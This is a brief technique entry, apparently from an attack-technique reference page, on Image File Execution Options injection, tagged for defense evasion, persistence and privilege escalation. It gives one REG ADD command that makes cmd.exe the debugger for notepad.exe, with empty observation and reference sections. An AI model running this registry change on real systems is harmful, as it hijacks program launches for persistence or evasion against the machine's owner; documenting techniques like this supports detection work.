Image File Execution Options Injection
Defense Evasion, Persistence, Privilege Escalation
Execution
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"

Observations


References
Last updated